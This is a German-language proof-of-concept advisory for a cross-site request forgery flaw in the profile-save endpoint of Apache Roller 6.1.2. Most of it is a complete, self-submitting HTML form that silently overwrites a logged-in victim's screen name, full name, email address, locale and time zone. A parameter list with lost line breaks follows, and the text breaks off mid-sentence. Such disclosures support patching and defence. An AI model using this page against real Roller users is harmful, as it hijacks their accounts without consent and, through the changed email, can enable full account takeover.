
PoC-Exploit für eine CSRF-Schwachstelle im Profilaktualisierungs-Endpunkt von Apache Roller v6.1.2. Enthält HTML-Formular-Exploit-Code, um unbefugte Profiländerungen zu demonstrieren.
Es wurde festgestellt, dass Roller v6.1.2 und frühere Versionen eine Cross-Site Request Forgery (CSRF)-Schwachstelle im Endpunkt /roller/roller-ui/profile!save.rol enthalten.
Diese Schwachstelle ermöglicht es Angreifern, die Profilinformationen des Opfers (z. B. E-Mail, vollständiger Name, Gebietsschema, Zeitzone) über eine manipulierte HTML-Seite beliebig zu ändern.
Die Schwachstelle ermöglicht nicht autorisierte Anfragen an /roller/roller-ui/profile!save.rol, die das Benutzerprofil ohne CSRF-Schutz aktualisieren.
<html>
<head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</head>
</html>
bean.userName: vanlambean.screenName: hackedbean.fullName: hackedbean.emailAddress: [email protected]bean.passwordText: (leer)bean.passwordConfirm: (leer)bean.locale: vi_VNbean.timeZone: Asia/BangkokEin Angreifer kann eine schädliche HTML-Seite erstellen, die, wenn sie von einem authentifizierten Roller-Benutzer besucht wird, automatisch ein Formular zum Aktualisieren der Profilinformationen des Opfers ohne dessen Zustimmung absendet. Dies kann zu Folgendem führen: